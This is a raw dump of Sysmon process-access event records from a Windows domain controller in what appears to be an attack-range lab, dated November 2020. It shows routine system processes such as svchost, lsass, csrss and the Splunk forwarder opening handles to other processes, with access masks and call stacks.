15:53:21.997{D28789B6-7C62-5FA1-0A00-000000008801}852948C:\Windows\system32\services.exe{D28789B6-7CF1-5FA1-6401-000000008801}4028C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.686{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.686{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.686{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.686{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.686{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.686{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.671{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.671{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:23.671{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:53.328{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CF2-5FA1-6501-000000008801}3920C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:53.328{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CF2-5FA1-6501-000000008801}3920C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:01.679{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7D19-5FA1-6601-000000008801}1740C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:01.679{D28789B6-7C64-5FA1-1000-000000008801}11442216C:\Windows\system32\svchost.exe{D28789B6-7D19-5FA1-6601-000000008801}1740C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:01.679{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:01.679{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:05.214{D28789B6-7C6A-5FA1-2500-000000008801}30243040C:\Windows\servicing\TrustedInstaller.exe{D28789B6-7C6A-5FA1-2600-000000008801}3064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.922{D28789B6-7D23-5FA1-6801-000000008801}25124912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D23-5FA1-6801-000000008801}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:11.797{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 